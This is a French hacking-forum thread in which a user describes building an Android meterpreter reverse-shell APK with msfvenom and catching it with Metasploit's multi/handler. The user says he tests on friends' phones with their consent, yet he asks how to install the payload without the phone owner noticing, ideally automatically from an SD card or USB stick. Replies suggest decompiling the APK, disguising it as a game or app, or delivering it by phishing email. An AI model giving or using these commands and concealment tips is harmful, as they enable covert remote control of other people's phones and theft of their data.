Tu veux dire, c'était un ami ??? Le programme est en java ? Ce n'est pas daemon, pour android on appelle cela Service

Non non, c'est un ami (encore actuellement haha). J'ai deux trois potes qui m'autorisent à tester sur leurs appareils. Ça me permet de m'entrainer dans un environment qui n'est pas le mien, je préfère. ^^

J'ai utilisé cette commande : msfvevom -p android/meterpreter/reverse_tcp LHOST=MonIP LPORT=LePortChoisi R >Nom.apk

Puis je passe sur la console de Metasploit avec : msfconsole

Ensuite je lance le hack avec les commandes suivantes :

use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST MonIP
set LPORT LePortChoisi
exploit

Merci pour le vocabulaire, je ne savais pas qu'on appelait ça différemment sur Android.

Edit :

Evidemment, j'installe le hack sur le téléphone infecté avant de passer sur Metasploit.
En passant par cette procédure, mon ami a du installer lui-même le hack sur son téléphone.
Du coup ma question est la suivante : comment faire pour que je puisse l'installer sans qu'il s'en rende compte ? (du moins, dans l'idée)

Malheureusement, mais connaissances sont encore trop limité pour savoir dans quel langage est codé le payload. Si tu veux, je peux te l'envoyer pour que tu l'analyses ?

Pour avoir l'original tu devra décompiler le file APK Tu aura un fichier de type XML. Le but étant de travailler sur les uses-permissions. Il travaille sur les autorisations. Bref, renseigne toi sur google, tu comprendras une fois décompiler et étudié le code de ton payload.

Je ne suis pas connaisseur du domaine, mais de ce que j'ai compris il faut forcément que ta cible (ici ton ami) installe ton hack d'une manière ou d'une autre. Donc soit tu caches ça dans une appli android quelconque (jeu, appli de prise de note ou n'importe quoi), soit tu envoies un lien Internet d'où il télécharge ce hack (déguisé en ce que tu veux).

Décompiler l'apk, retravailler le code... C'est noté, merci DreAmuS !

[email protected]§eeker Ce que tu me proposes serait une étapes de plus vers ce que je recherche.
Dans l'idée, j'aimerai vraiment que l'utilisateur n'ait pas à interagir avec le fichier, qu'une fois qu'il sera sur son téléphone il s'exécute tout seul comme un grand.

Je vais quand même regarder les différents moyens qui existent pour le déguiser ! Merci du conseil.

Si tu veux envoyer un fichier infecté à quelqu'un d'autre que tes amis, pas besoin de te compliquer la vie.
Tu camoufles le truc dans un email et la --> Social Enginnering
Fouille un peu sur le forum, y'a pas mal de bon tuto qui traînent, et c'est plus simple (je trouve) que de camoufler le truc dans une fausse app...

Bref, bon courage dans tes recherches, même si je trouve cela un peu "limite" pour tes amis...

Salut Bioshock,

L'objectif final serait d'installer le service sur une micro SD qui, en plugant sur le téléphone, installera tout seul le payload (ou bien sur une clé USB pour un ordinateur etc).
Le problème du mail c'est qu'on a encore besoin d'une interaction utilisateur. J'apprendrai bien entendu à le faire, mais ce n'est pas ce que je recherche au final.

Juste pour être clair, toutes les manipulation que je fais sur le matériel de mes amis se fait avec leur présence à côté de moi, et je leur explique "simplement" tout ce que je fais. Je ne cherche pas à les hacker, mais à m'entrainer dans un environment qui n'est pas le mien. La preuve, le payload que j'avais préalablement préparer chez moi n'a pas fonctionner sur le téléphone de mon ami, à cause d'un problème d'IP que je n'avais pas prévu (et que je ne pouvais pas prévoir en restant chez moi). Il n'y a aucune intention de nuire dans la démarche.

Merci pour ta réponse en tout cas ! Si tu as des pistes de recherche me permettant d'atteindre mon objectif final, je suis preneur. En attendant, je vais m'entraîner au social enginnering !

Encore merci, et bonne soirée !

Jeriko

Jeriko Ok je comprends ou tu voulais en venir, je proposais seulement une alternative. Et me voilà rassuré pour te amis

Bonne chance, tiens nous au courant,

Bioshock